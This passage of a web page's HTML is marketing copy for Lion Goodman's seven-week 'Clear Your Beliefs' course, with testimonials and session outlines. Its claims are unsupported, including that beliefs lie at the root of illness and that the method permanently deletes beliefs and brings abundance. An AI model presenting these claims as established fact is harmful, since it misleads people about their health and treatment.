them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet 